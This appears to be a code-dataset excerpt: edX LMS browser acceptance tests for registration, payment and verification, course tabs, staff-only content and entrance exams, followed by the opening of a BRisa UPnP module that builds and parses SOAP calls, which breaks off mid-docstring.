def setUp(self):
"""Initialize the page objects and create a test course. """
super(RegisterFromCombinedPageTest, self).setUp()
self.register_page = CombinedLoginAndRegisterPage(
self.browser,
start_page="register",
course_id=self.course_id
)
self.dashboard_page = DashboardPage(self.browser)
# Create a course to enroll in
CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
).install()
def test_register_success(self):
# Navigate to the registration page
self.register_page.visit()
# Fill in the form and submit it
username = "test_{uuid}".format(uuid=self.unique_id[0:6])
email = "{user}@example.com".format(user=username)
self.register_page.register(
email=email,
password="password",
username=username,
full_name="Test User",
country="US",
terms_of_service=True
)
# Expect that we reach the dashboard and we're auto-enrolled in the course
course_names = self.dashboard_page.wait_for_page().available_courses
self.assertIn(self.course_info["display_name"], course_names)
self.assertEqual("want to change your account settings?", self.dashboard_page.sidebar_menu_title.lower())
self.assertEqual(
"click the arrow next to your username above.",
self.dashboard_page.sidebar_menu_description.lower()
)
def test_register_failure(self):
# Navigate to the registration page
self.register_page.visit()
# Enter a blank for the username field, which is required
# Don't agree to the terms of service / honor code.
# Don't specify a country code, which is required.
username = "test_{uuid}".format(uuid=self.unique_id[0:6])
email = "{user}@example.com".format(user=username)
self.register_page.register(
email=email,
password="password",
username="",
full_name="Test User",
terms_of_service=False
)
# Verify that the expected errors are displayed.
errors = self.register_page.wait_for_errors()
self.assertIn(u'Please enter your Public username.', errors)
self.assertIn(u'You must agree to the edX Terms of Service and Honor Code.', errors)
self.assertIn(u'Please select your Country.', errors)
def test_toggle_to_login_form(self):
self.register_page.visit().toggle_form()
self.assertEqual(self.register_page.current_form, "login")
@attr('shard_1')
class PayAndVerifyTest(EventsTestMixin, UniqueCourseTest):
"""Test that we can proceed through the payment and verification flow."""
def setUp(self):
"""Initialize the test.
Create the necessary page objects, create a test course and configure its modes,
create a user and log them in.
"""
super(PayAndVerifyTest, self).setUp()
self.track_selection_page = TrackSelectionPage(self.browser, self.course_id)
self.payment_and_verification_flow = PaymentAndVerificationFlow(self.browser, self.course_id)
self.immediate_verification_page = PaymentAndVerificationFlow(self.browser, self.course_id, entry_point='verify-now')
self.upgrade_page = PaymentAndVerificationFlow(self.browser, self.course_id, entry_point='upgrade')
self.fake_payment_page = FakePaymentPage(self.browser, self.course_id)
self.dashboard_page = DashboardPage(self.browser)
# Create a course
CourseFixture(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
self.course_info['display_name']
).install()
# Add an honor mode to the course
ModeCreationPage(self.browser, self.course_id).visit()
# Add a verified mode to the course
ModeCreationPage(self.browser, self.course_id, mode_slug=u'verified', mode_display_name=u'Verified Certificate', min_price=10, suggested_prices='10,20').visit()
@skip("Flaky 02/02/2015")
def test_immediate_verification_enrollment(self):
# Create a user and log them in
student_id = AutoAuthPage(self.browser).visit().get_user_id()
# Navigate to the track selection page
self.track_selection_page.visit()
# Enter the payment and verification flow by choosing to enroll as verified
self.track_selection_page.enroll('verified')
# Proceed to the fake payment page
self.payment_and_verification_flow.proceed_to_payment()
# Submit payment
self.fake_payment_page.submit_payment()
# Expect enrollment activated event
self.assert_event_emitted_num_times(
"edx.course.enrollment.activated",
self.start_time,
student_id,
1
)
# Expect that one mode_changed enrollment event fired as part of the upgrade
self.assert_event_emitted_num_times(
"edx.course.enrollment.mode_changed",
self.start_time,
student_id,
1
)
# Proceed to verification
self.payment_and_verification_flow.immediate_verification()
# Take face photo and proceed to the ID photo step
self.payment_and_verification_flow.webcam_capture()
self.payment_and_verification_flow.next_verification_step(self.immediate_verification_page)
# Take ID photo and proceed to the review photos step
self.payment_and_verification_flow.webcam_capture()
self.payment_and_verification_flow.next_verification_step(self.immediate_verification_page)
# Submit photos and proceed to the enrollment confirmation step
self.payment_and_verification_flow.next_verification_step(self.immediate_verification_page)
# Navigate to the dashboard
self.dashboard_page.visit()
# Expect that we're enrolled as verified in the course
enrollment_mode = self.dashboard_page.get_enrollment_mode(self.course_info["display_name"])
self.assertEqual(enrollment_mode, 'verified')
def test_deferred_verification_enrollment(self):
# Create a user and log them in
student_id = AutoAuthPage(self.browser).visit().get_user_id()
# Navigate to the track selection page
self.track_selection_page.visit()
# Enter the payment and verification flow by choosing to enroll as verified
self.track_selection_page.enroll('verified')
# Proceed to the fake payment page
self.payment_and_verification_flow.proceed_to_payment()
# Submit payment
self.fake_payment_page.submit_payment()
# Expect enrollment activated event
self.assert_event_emitted_num_times(
"edx.course.enrollment.activated",
self.start_time,
student_id,
1
)
# Navigate to the dashboard
self.dashboard_page.visit()
# Expect that we're enrolled as verified in the course
enrollment_mode = self.dashboard_page.get_enrollment_mode(self.course_info["display_name"])
self.assertEqual(enrollment_mode, 'verified')
def test_enrollment_upgrade(self):
# Create a user, log them in, and enroll them in the honor mode
student_id = AutoAuthPage(self.browser, course_id=self.course_id).visit().get_user_id()
# Navigate to the dashboard
self.dashboard_page.visit()
# Expect that we're enrolled as honor in the course
enrollment_mode = self.dashboard_page.get_enrollment_mode(self.course_info["display_name"])
self.assertEqual(enrollment_mode, 'honor')
# Click the upsell button on the dashboard
self.dashboard_page.upgrade_enrollment(self.course_info["display_name"], self.upgrade_page)
# Select the first contribution option appearing on the page
self.upgrade_page.indicate_contribution()
# Proceed to the fake payment page
self.upgrade_page.proceed_to_payment()
# Submit payment
self.fake_payment_page.submit_payment()
# Expect that one mode_changed enrollment event fired as part of the upgrade
self.assert_event_emitted_num_times(
"edx.course.enrollment.mode_changed",
self.start_time,
student_id,
1
)
# Expect no enrollment activated event
self.assert_event_emitted_num_times(
"edx.course.enrollment.activated",
self.start_time,
student_id,
0
)
# Navigate to the dashboard
self.dashboard_page.visit()
# Expect that we're enrolled as verified in the course
enrollment_mode = self.dashboard_page.get_enrollment_mode(self.course_info["display_name"])
self.assertEqual(enrollment_mode, 'verified')
class CourseWikiTest(UniqueCourseTest):
"""
Tests that verify the course wiki.
"""
def setUp(self):
"""
Initialize pages and install a course fixture.
"""
super(CourseWikiTest, self).setUp()
# self.course_info['number'] must be shorter since we are accessing the wiki. See TNL-1751
self.course_info['number'] = self.unique_id[0:6]
self.course_info_page = CourseInfoPage(self.browser, self.course_id)
self.course_wiki_page = CourseWikiPage(self.browser, self.course_id)
self.course_info_page = CourseInfoPage(self.browser, self.course_id)
self.course_wiki_edit_page = CourseWikiEditPage(self.browser, self.course_id, self.course_info)
self.tab_nav = TabNavPage(self.browser)
CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
).install()
# Auto-auth register for the course
AutoAuthPage(self.browser, course_id=self.course_id).visit()
# Access course wiki page
self.course_info_page.visit()
self.tab_nav.go_to_tab('Wiki')
def _open_editor(self):
self.course_wiki_page.open_editor()
self.course_wiki_edit_page.wait_for_page()
def test_edit_course_wiki(self):
"""
Wiki page by default is editable for students.
After accessing the course wiki,
Replace the content of the default page
Confirm new content has been saved
"""
content = "hello"
self._open_editor()
self.course_wiki_edit_page.replace_wiki_content(content)
self.course_wiki_edit_page.save_wiki_content()
actual_content = unicode(self.course_wiki_page.q(css='.wiki-article p').text[0])
self.assertEqual(content, actual_content)
class HighLevelTabTest(UniqueCourseTest):
"""
Tests that verify each of the high-level tabs available within a course.
"""
def setUp(self):
"""
Initialize pages and install a course fixture.
"""
super(HighLevelTabTest, self).setUp()
# self.course_info['number'] must be shorter since we are accessing the wiki. See TNL-1751
self.course_info['number'] = self.unique_id[0:6]
self.course_info_page = CourseInfoPage(self.browser, self.course_id)
self.progress_page = ProgressPage(self.browser, self.course_id)
self.course_nav = CourseNavPage(self.browser)
self.tab_nav = TabNavPage(self.browser)
self.video = VideoPage(self.browser)
# Install a course with sections/problems, tabs, updates, and handouts
course_fix = CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
)
course_fix.add_update(
CourseUpdateDesc(date='January 29, 2014', content='Test course update1')
)
course_fix.add_handout('demoPDF.pdf')
course_fix.add_children(
XBlockFixtureDesc('static_tab', 'Test Static Tab'),
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('problem', 'Test Problem 1', data=load_data_str('multiple_choice.xml')),
XBlockFixtureDesc('problem', 'Test Problem 2', data=load_data_str('formula_problem.xml')),
XBlockFixtureDesc('html', 'Test HTML'),
)
),
XBlockFixtureDesc('chapter', 'Test Section 2').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection 2'),
XBlockFixtureDesc('sequential', 'Test Subsection 3'),
)
).install()
# Auto-auth register for the course
AutoAuthPage(self.browser, course_id=self.course_id).visit()
def test_course_info(self):
"""
Navigate to the course info page.
"""
# Navigate to the course info page from the progress page
self.progress_page.visit()
self.tab_nav.go_to_tab('Course Info')
# Expect just one update
self.assertEqual(self.course_info_page.num_updates, 1)
# Expect a link to the demo handout pdf
handout_links = self.course_info_page.handout_links
self.assertEqual(len(handout_links), 1)
self.assertIn('demoPDF.pdf', handout_links[0])
def test_progress(self):
"""
Navigate to the progress page.
"""
# Navigate to the progress page from the info page
self.course_info_page.visit()
self.tab_nav.go_to_tab('Progress')
# We haven't answered any problems yet, so assume scores are zero
# Only problems should have scores; so there should be 2 scores.
CHAPTER = 'Test Section'
SECTION = 'Test Subsection'
EXPECTED_SCORES = [(0, 3), (0, 1)]
actual_scores = self.progress_page.scores(CHAPTER, SECTION)
self.assertEqual(actual_scores, EXPECTED_SCORES)
def test_static_tab(self):
"""
Navigate to a static tab (course content)
"""
# From the course info page, navigate to the static tab
self.course_info_page.visit()
self.tab_nav.go_to_tab('Test Static Tab')
self.assertTrue(self.tab_nav.is_on_tab('Test Static Tab'))
def test_wiki_tab_first_time(self):
"""
Navigate to the course wiki tab. When the wiki is accessed for
the first time, it is created on the fly.
"""
course_wiki = CourseWikiPage(self.browser, self.course_id)
# From the course info page, navigate to the wiki tab
self.course_info_page.visit()
self.tab_nav.go_to_tab('Wiki')
self.assertTrue(self.tab_nav.is_on_tab('Wiki'))
# Assert that a default wiki is created
expected_article_name = "{org}.{course_number}.{course_run}".format(
org=self.course_info['org'],
course_number=self.course_info['number'],
course_run=self.course_info['run']
)
self.assertEqual(expected_article_name, course_wiki.article_name)
def test_courseware_nav(self):
"""
Navigate to a particular unit in the courseware.
"""
# Navigate to the courseware page from the info page
self.course_info_page.visit()
self.tab_nav.go_to_tab('Courseware')
# Check that the courseware navigation appears correctly
EXPECTED_SECTIONS = {
'Test Section': ['Test Subsection'],
'Test Section 2': ['Test Subsection 2', 'Test Subsection 3']
}
actual_sections = self.course_nav.sections
for section, subsections in EXPECTED_SECTIONS.iteritems():
self.assertIn(section, actual_sections)
self.assertEqual(actual_sections[section], EXPECTED_SECTIONS[section])
# Navigate to a particular section
self.course_nav.go_to_section('Test Section', 'Test Subsection')
# Check the sequence items
EXPECTED_ITEMS = ['Test Problem 1', 'Test Problem 2', 'Test HTML']
actual_items = self.course_nav.sequence_items
self.assertEqual(len(actual_items), len(EXPECTED_ITEMS))
for expected in EXPECTED_ITEMS:
self.assertIn(expected, actual_items)
class PDFTextBooksTabTest(UniqueCourseTest):
"""
Tests that verify each of the textbook tabs available within a course.
"""
def setUp(self):
"""
Initialize pages and install a course fixture.
"""
super(PDFTextBooksTabTest, self).setUp()
self.course_info_page = CourseInfoPage(self.browser, self.course_id)
self.tab_nav = TabNavPage(self.browser)
# Install a course with TextBooks
course_fix = CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
)
# Add PDF textbooks to course fixture.
for i in range(1, 3):
course_fix.add_textbook("PDF Book {}".format(i), [{"title": "Chapter Of Book {}".format(i), "url": ""}])
course_fix.install()
# Auto-auth register for the course
AutoAuthPage(self.browser, course_id=self.course_id).visit()
def test_verify_textbook_tabs(self):
"""
Test multiple pdf textbooks loads correctly in lms.
"""
self.course_info_page.visit()
# Verify each PDF textbook tab by visiting, it will fail if correct tab is not loaded.
for i in range(1, 3):
self.tab_nav.go_to_tab("PDF Book {}".format(i))
class VideoTest(UniqueCourseTest):
"""
Navigate to a video in the courseware and play it.
"""
def setUp(self):
"""
Initialize pages and install a course fixture.
"""
super(VideoTest, self).setUp()
self.course_info_page = CourseInfoPage(self.browser, self.course_id)
self.course_nav = CourseNavPage(self.browser)
self.tab_nav = TabNavPage(self.browser)
self.video = VideoPage(self.browser)
# Install a course fixture with a video component
course_fix = CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
)
course_fix.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit').add_children(
XBlockFixtureDesc('video', 'Video')
)))).install()
# Auto-auth register for the course
AutoAuthPage(self.browser, course_id=self.course_id).visit()
@skip("BLD-563: Video Player Stuck on Pause")
def test_video_player(self):
"""
Play a video in the courseware.
"""
# Navigate to a video
self.course_info_page.visit()
self.tab_nav.go_to_tab('Courseware')
# The video should start off paused
# Since the video hasn't loaded yet, it's elapsed time is 0
self.assertFalse(self.video.is_playing)
self.assertEqual(self.video.elapsed_time, 0)
# Play the video
self.video.play()
# Now we should be playing
self.assertTrue(self.video.is_playing)
# Commented the below EmptyPromise, will move to its page once this test is working and stable
# Also there is should be no Promise check in any test as this should be done in Page Object
# Wait for the video to load the duration
# EmptyPromise(
# lambda: self.video.duration > 0,
# 'video has duration', timeout=20
# ).fulfill()
# Pause the video
self.video.pause()
# Expect that the elapsed time and duration are reasonable
# Again, we can't expect the video to actually play because of
# latency through the ssh tunnel
self.assertGreaterEqual(self.video.elapsed_time, 0)
self.assertGreaterEqual(self.video.duration, self.video.elapsed_time)
class VisibleToStaffOnlyTest(UniqueCourseTest):
"""
Tests that content with visible_to_staff_only set to True cannot be viewed by students.
"""
def setUp(self):
super(VisibleToStaffOnlyTest, self).setUp()
course_fix = CourseFixture(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
self.course_info['display_name']
)
course_fix.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Subsection With Locked Unit').add_children(
XBlockFixtureDesc('vertical', 'Locked Unit', metadata={'visible_to_staff_only': True}).add_children(
XBlockFixtureDesc('html', 'Html Child in locked unit', data="<html>Visible only to staff</html>"),
),
XBlockFixtureDesc('vertical', 'Unlocked Unit').add_children(
XBlockFixtureDesc('html', 'Html Child in unlocked unit', data="<html>Visible only to all</html>"),
)
),
XBlockFixtureDesc('sequential', 'Unlocked Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit').add_children(
XBlockFixtureDesc('html', 'Html Child in visible unit', data="<html>Visible to all</html>"),
)
),
XBlockFixtureDesc('sequential', 'Locked Subsection', metadata={'visible_to_staff_only': True}).add_children(
XBlockFixtureDesc('vertical', 'Test Unit').add_children(
XBlockFixtureDesc(
'html', 'Html Child in locked subsection', data="<html>Visible only to staff</html>"
)
)
)
)
).install()
self.courseware_page = CoursewarePage(self.browser, self.course_id)
self.course_nav = CourseNavPage(self.browser)
def test_visible_to_staff(self):
"""
Scenario: All content is visible for a user marked is_staff (different from course staff)
Given some of the course content has been marked 'visible_to_staff_only'
And I am logged on with an account marked 'is_staff'
Then I can see all course content
"""
AutoAuthPage(self.browser, username="STAFF_TESTER", email="johndoe_staff@example.com",
course_id=self.course_id, staff=True).visit()
self.courseware_page.visit()
self.assertEqual(3, len(self.course_nav.sections['Test Section']))
self.course_nav.go_to_section("Test Section", "Subsection With Locked Unit")
self.assertEqual(["Html Child in locked unit", "Html Child in unlocked unit"], self.course_nav.sequence_items)
self.course_nav.go_to_section("Test Section", "Unlocked Subsection")
self.assertEqual(["Html Child in visible unit"], self.course_nav.sequence_items)
self.course_nav.go_to_section("Test Section", "Locked Subsection")
self.assertEqual(["Html Child in locked subsection"], self.course_nav.sequence_items)
def test_visible_to_student(self):
"""
Scenario: Content marked 'visible_to_staff_only' is not visible for students in the course
Given some of the course content has been marked 'visible_to_staff_only'
And I am logged on with an authorized student account
Then I can only see content without 'visible_to_staff_only' set to True
"""
AutoAuthPage(self.browser, username="STUDENT_TESTER", email="johndoe_student@example.com",
course_id=self.course_id, staff=False).visit()
self.courseware_page.visit()
self.assertEqual(2, len(self.course_nav.sections['Test Section']))
self.course_nav.go_to_section("Test Section", "Subsection With Locked Unit")
self.assertEqual(["Html Child in unlocked unit"], self.course_nav.sequence_items)
self.course_nav.go_to_section("Test Section", "Unlocked Subsection")
self.assertEqual(["Html Child in visible unit"], self.course_nav.sequence_items)
class TooltipTest(UniqueCourseTest):
"""
Tests that tooltips are displayed
"""
def setUp(self):
"""
Initialize pages and install a course fixture.
"""
super(TooltipTest, self).setUp()
self.course_info_page = CourseInfoPage(self.browser, self.course_id)
self.tab_nav = TabNavPage(self.browser)
course_fix = CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
)
course_fix.add_children(
XBlockFixtureDesc('static_tab', 'Test Static Tab'),
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('problem', 'Test Problem 1', data=load_data_str('multiple_choice.xml')),
XBlockFixtureDesc('problem', 'Test Problem 2', data=load_data_str('formula_problem.xml')),
XBlockFixtureDesc('html', 'Test HTML'),
)
)
).install()
self.courseware_page = CoursewarePage(self.browser, self.course_id)
# Auto-auth register for the course
AutoAuthPage(self.browser, course_id=self.course_id).visit()
def test_tooltip(self):
"""
Verify that tooltips are displayed when you hover over the sequence nav bar.
"""
self.course_info_page.visit()
self.tab_nav.go_to_tab('Courseware')
self.assertTrue(self.courseware_page.tooltips_displayed())
class PreRequisiteCourseTest(UniqueCourseTest):
"""
Tests that pre-requisite course messages are displayed
"""
def setUp(self):
"""
Initialize pages and install a course fixture.
"""
super(PreRequisiteCourseTest, self).setUp()
CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
).install()
self.prc_info = {
'org': 'test_org',
'number': self.unique_id,
'run': 'prc_test_run',
'display_name': 'PR Test Course' + self.unique_id
}
CourseFixture(
self.prc_info['org'], self.prc_info['number'],
self.prc_info['run'], self.prc_info['display_name']
).install()
pre_requisite_course_key = generate_course_key(
self.prc_info['org'],
self.prc_info['number'],
self.prc_info['run']
)
self.pre_requisite_course_id = unicode(pre_requisite_course_key)
self.dashboard_page = DashboardPage(self.browser)
self.settings_page = SettingsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
# Auto-auth register for the course
AutoAuthPage(self.browser, course_id=self.course_id).visit()
def test_dashboard_message(self):
"""
Scenario: Any course where there is a Pre-Requisite course Student dashboard should have
appropriate messaging.
Given that I am on the Student dashboard
When I view a course with a pre-requisite course set
Then At the bottom of course I should see course requirements message.'
"""
# visit dashboard page and make sure there is not pre-requisite course message
self.dashboard_page.visit()
self.assertFalse(self.dashboard_page.pre_requisite_message_displayed())
# Logout and login as a staff.
LogoutPage(self.browser).visit()
AutoAuthPage(self.browser, course_id=self.course_id, staff=True).visit()
# visit course settings page and set pre-requisite course
self.settings_page.visit()
self._set_pre_requisite_course()
# Logout and login as a student.
LogoutPage(self.browser).visit()
AutoAuthPage(self.browser, course_id=self.course_id, staff=False).visit()
# visit dashboard page again now it should have pre-requisite course message
self.dashboard_page.visit()
EmptyPromise(lambda: self.dashboard_page.available_courses > 0, 'Dashboard page loaded').fulfill()
self.assertTrue(self.dashboard_page.pre_requisite_message_displayed())
def _set_pre_requisite_course(self):
"""
set pre-requisite course
"""
select_option_by_value(self.settings_page.pre_requisite_course_options, self.pre_requisite_course_id)
self.settings_page.save_changes()
class ProblemExecutionTest(UniqueCourseTest):
"""
Tests of problems.
"""
def setUp(self):
"""
Initialize pages and install a course fixture.
"""
super(ProblemExecutionTest, self).setUp()
self.course_info_page = CourseInfoPage(self.browser, self.course_id)
self.course_nav = CourseNavPage(self.browser)
self.tab_nav = TabNavPage(self.browser)
# Install a course with sections and problems.
course_fix = CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
)
course_fix.add_asset(['python_lib.zip'])
course_fix.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('problem', 'Python Problem', data=dedent(
"""\
<problem>
<script type="loncapa/python">
from number_helpers import seventeen, fortytwo
oneseven = seventeen()
def check_function(expect, ans):
if int(ans) == fortytwo(-22):
return True
else:
return False
</script>
<p>What is the sum of $oneseven and 3?</p>
<customresponse expect="20" cfn="check_function">
<textline/>
</customresponse>
</problem>
"""
))
)
)
).install()
# Auto-auth register for the course
AutoAuthPage(self.browser, course_id=self.course_id).visit()
def test_python_execution_in_problem(self):
# Navigate to the problem page
self.course_info_page.visit()
self.tab_nav.go_to_tab('Courseware')
self.course_nav.go_to_section('Test Section', 'Test Subsection')
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'PYTHON PROBLEM')
# Does the page have computation results?
self.assertIn("What is the sum of 17 and 3?", problem_page.problem_text)
# Fill in the answer correctly.
problem_page.fill_answer("20")
problem_page.click_check()
self.assertTrue(problem_page.is_correct())
# Fill in the answer incorrectly.
problem_page.fill_answer("4")
problem_page.click_check()
self.assertFalse(problem_page.is_correct())
class EntranceExamTest(UniqueCourseTest):
"""
Tests that course has an entrance exam.
"""
def setUp(self):
"""
Initialize pages and install a course fixture.
"""
super(EntranceExamTest, self).setUp()
CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
).install()
self.courseware_page = CoursewarePage(self.browser, self.course_id)
self.settings_page = SettingsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
# Auto-auth register for the course
AutoAuthPage(self.browser, course_id=self.course_id).visit()
def test_entrance_exam_section(self):
"""
Scenario: Any course that is enabled for an entrance exam, should have entrance exam chapter at courseware
page.
Given that I am on the courseware page
When I view the courseware that has an entrance exam
Then there should be an "Entrance Exam" chapter.'
"""
entrance_exam_link_selector = 'div#accordion nav div h3 a'
# visit courseware page and make sure there is not entrance exam chapter.
self.courseware_page.visit()
self.courseware_page.wait_for_page()
self.assertFalse(element_has_text(
page=self.courseware_page,
css_selector=entrance_exam_link_selector,
text='Entrance Exam'
))
# Logout and login as a staff.
LogoutPage(self.browser).visit()
AutoAuthPage(self.browser, course_id=self.course_id, staff=True).visit()
# visit course settings page and set/enabled entrance exam for that course.
self.settings_page.visit()
self.settings_page.wait_for_page()
self.assertTrue(self.settings_page.is_browser_on_page())
self.settings_page.entrance_exam_field.click()
self.settings_page.save_changes()
# Logout and login as a student.
LogoutPage(self.browser).visit()
AutoAuthPage(self.browser, course_id=self.course_id, staff=False).visit()
# visit course info page and make sure there is an "Entrance Exam" section.
self.courseware_page.visit()
self.courseware_page.wait_for_page()
self.assertTrue(element_has_text(
page=self.courseware_page,
css_selector=entrance_exam_link_selector,
text='Entrance Exam'
))
| cselis86/edx-platform | common/test/acceptance/tests/lms/test_lms.py | Python | agpl-3.0 | 39,598 | [
"VisIt"
] | 513c7440d5d78b99f2c618c8be3eaa61ac84b026b7815f01a114de714d68f511 |
# Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php or see LICENSE file.
# Copyright 2007-2008 Brisa Team <brisa-develop@garage.maemo.org>
#
# Copyright 2001 - Cayce Ullman <http://pywebsvcs.sourceforge.net>
# Copyright 2001 - Brian Matthews <http://pywebsvcs.sourceforge.net>
# Copyright 2001-2003 - Pfizer <http://pywebsvcs.sourceforge.net>
# Copyright 2007-2008 - Frank Scholz <coherence@beebits.net>
""" Parses and builds SOAP calls transparently.
"""
import http.client
from xml.etree import ElementTree
from brisa.core.network import parse_xml, parse_url
from brisa.upnp.upnp_defaults import map_upnp_value, map_upnp_type
USER_AGENT = "BRisa UPnP and DLNA Framework";
# SOAP constants
NS_SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
NS_SOAP_ENC = "http://schemas.xmlsoap.org/soap/encoding/"
NS_XSI = "http://www.w3.org/1999/XMLSchema-instance"
NS_XSD = "http://www.w3.org/1999/XMLSchema"
UPNPERRORS = {401: 'Invalid Action',
402: 'Invalid Args',
501: 'Action Failed',
600: 'Argument Value Invalid',
601: 'Argument Value Out of Range',
602: 'Optional Action Not Implemented',
603: 'Out Of Memory',
604: 'Human Intervention Required',
605: 'String Argument Too Long',
606: 'Action Not Authorized',
607: 'Signature Failure',
608: 'Signature Missing',
609: 'Not Encrypted',
610: 'Invalid Sequence',
611: 'Invalid Control URL',
612: 'No Such Session', }
def build_soap_error(status, description='without words'):
""" Builds an UPnP SOAP error message.
@param status: error code
@param description: error default description
@type status: integer
@type description: string
@return: soap call representing the error
@rtype: string
"""
root = ElementTree.Element('s:Fault')
ElementTree.SubElement(root, 'faultcode').text = 's:Client'
ElementTree.SubElement(root, 'faultstring').text = 'UPnPError'
e = ElementTree.SubElement(root, 'detail')
e = ElementTree.SubElement(e, 'UPnPError')
e.attrib['xmlns'] = 'urn:schemas-upnp-org:control-1-0'
ElementTree.SubElement(e, 'errorCode').text = str(status)
ElementTree.SubElement(e, 'errorDescription').text = UPNPERRORS.get(status,
description)
return build_soap_call(None, root, encoding=None)
def build_soap_call(method, arguments, encoding=NS_SOAP_ENC,
envelope_attrib=None, typed=None, header_args=None):
""" Builds a soap call.
@param method: method for the soap call. If set to None, the method element
will be omitted and arguments will be added directly to the body (error
message)
@param arguments: arguments for the call
@param encoding: encoding for the call
@param envelope_attrib: envelope attribute
@param typed: True if typed
@param header_args: header arguments if any. It should be dict of dict
@type method: string or None
@type arguments: dict or ElementTree.Element
@type encoding: string
@type envelope_attrib: list
@type typed: boolean or None
@type header_args: dict or ElementTree.Element or None
@return: soap call
@rtype: string
"""
envelope = ElementTree.Element("s:Envelope")
if envelope_attrib:
for n in envelope_attrib:
envelope.attrib.update({n[0]: n[1]})
else:
envelope.attrib.update({'s:encodingStyle': NS_SOAP_ENC})
envelope.attrib.update({'xmlns:s': NS_SOAP_ENV})
qname_ns = NS_XSD
if header_args and isinstance(header_args, dict) and len(header_args) > 0:
header = ElementTree.SubElement(envelope, "s:Header")
if encoding:
header.set("{%s}encodingStyle" % NS_SOAP_ENV, encoding)
try:
for header_name, header_args_dict in list(header_args.items()):
header_name_elem = ElementTree.SubElement(header, header_name)
if isinstance(header_args_dict, dict):
for header_arg_name, header_arg_val in list(header_args_dict.items()):
header_arg_type = map_upnp_type(header_arg_val)
header_arg_val = map_upnp_value(header_arg_val)
he = ElementTree.SubElement(header_name_elem, header_arg_name)
if typed and arg_type:
if not isinstance(type, ElementTree.QName):
header_arg_type = ElementTree.QName(qname_ns,
header_arg_type)
he.set('{%s}type' % NS_XSI, header_arg_type)
he.text = header_arg_val
except Exception as e:
log.error("Ignoring soap header due to malformed header_args dict")
print((str(e)))
elif ElementTree.iselement(header_args):
header = ElementTree.SubElement(envelope, "s:Header")
header.append(header_args)
body = ElementTree.SubElement(envelope, "s:Body")
if method:
re = ElementTree.SubElement(body, method)
if encoding:
re.set("{%s}encodingStyle" % NS_SOAP_ENV, encoding)
else:
re = body
# append the arguments
if isinstance(arguments, dict):
for arg_name, arg_val in list(arguments.items()):
arg_type = map_upnp_type(arg_val)
arg_val = map_upnp_value(arg_val)
e = ElementTree.SubElement(re, arg_name)
if typed and arg_type:
if not isinstance(type, ElementTree.QName):
arg_type = ElementTree.QName(qname_ns, arg_type)
e.set('{%s}type' % NS_XSI, arg_type)
e.text = arg_val
else:
re.append(arguments)
preamble = """<?xml version="1.0" encoding="utf-8"?>"""
return '%s%s' % (preamble, ElementTree.tostring(envelope, 'utf-8').decode('utf-8'))
def __decode_result(element):
""" Decodes the result out of an Element. Returns the text, if possible.
@param element: element to decode the result
@type element Element
@return: text of the result
@rtype: string
"""
type = element.get('{%s}type' % NS_XSI)
if type is not None:
try:
prefix, local = type.split(":")
if prefix == 'xsd':
type = local
except ValueError:
pass
if type == "integer" or type == "int":
return int(element.text)
if type == "float" or type == "double":
return float(element.text)
if type == "boolean":
return element.text == "true"
return element.text or ""
def parse_soap_call(data):
""" Parses a soap call and returns a 4-tuple.
@param data: raw soap XML call data
@type data: string
@return: 4-tuple (method_name, args, kwargs, namespace)
@rtype: tuple
"""
args = []
kwargs = {}
ns = "http://schemas.xmlsoap.org/soap/envelope/"
tree = parse_xml(data)
header = tree.find('{%s}Header' % ns)
kwargs['__header__'] = {}
if header:
for e in list(header):
kwargs['__header__'][e.tag] = {}
for se in list(e):
kwargs['__header__'][e.tag][se.tag] = {}
kwargs['__header__'][e.tag][se.tag]['__value__'] = __decode_result(se)
kwargs['__header__'][e.tag][se.tag]['__attrib__'] = se.attrib
body = tree.find('{%s}Body' % ns)
method = body.getchildren()[0]
method_name = method.tag
ns = None
if method_name.startswith('{') and method_name.rfind('}') > 1:
ns, method_name = method_name[1:].split('}')
for child in method.getchildren():
kwargs[child.tag] = __decode_result(child)
args.append(kwargs[child.tag])
return method_name, args, kwargs, ns
class SOAPProxy(object):
""" Proxy for making remote SOAP calls Based on twisted.web.soap.Proxy
and SOAPpy.
"""
def __init__(self, url, namespace=None, soap_header={}):
""" Constructor for the SOAPProxy class.
@param url: remote SOAP server
@param namespace: calls namespace
@type url: string
@type namespace: tuple
"""
self.url = url
self.namespace = namespace
if isinstance(soap_header, dict):
self.soap_header = dict(("{%s}%s" % (ns[1], k), v)
for k, v in list(soap_header.items()))
else:
self.soap_header = {}
def call_remote(self, soapmethod, **kwargs):
""" Performs a remote SOAP call.
@param soapmethod: method to be called
@param kwargs: args to be passed, can be named.
@type soapmethod: string
@type kwargs: dictionary
@return: the result text of the soap call.
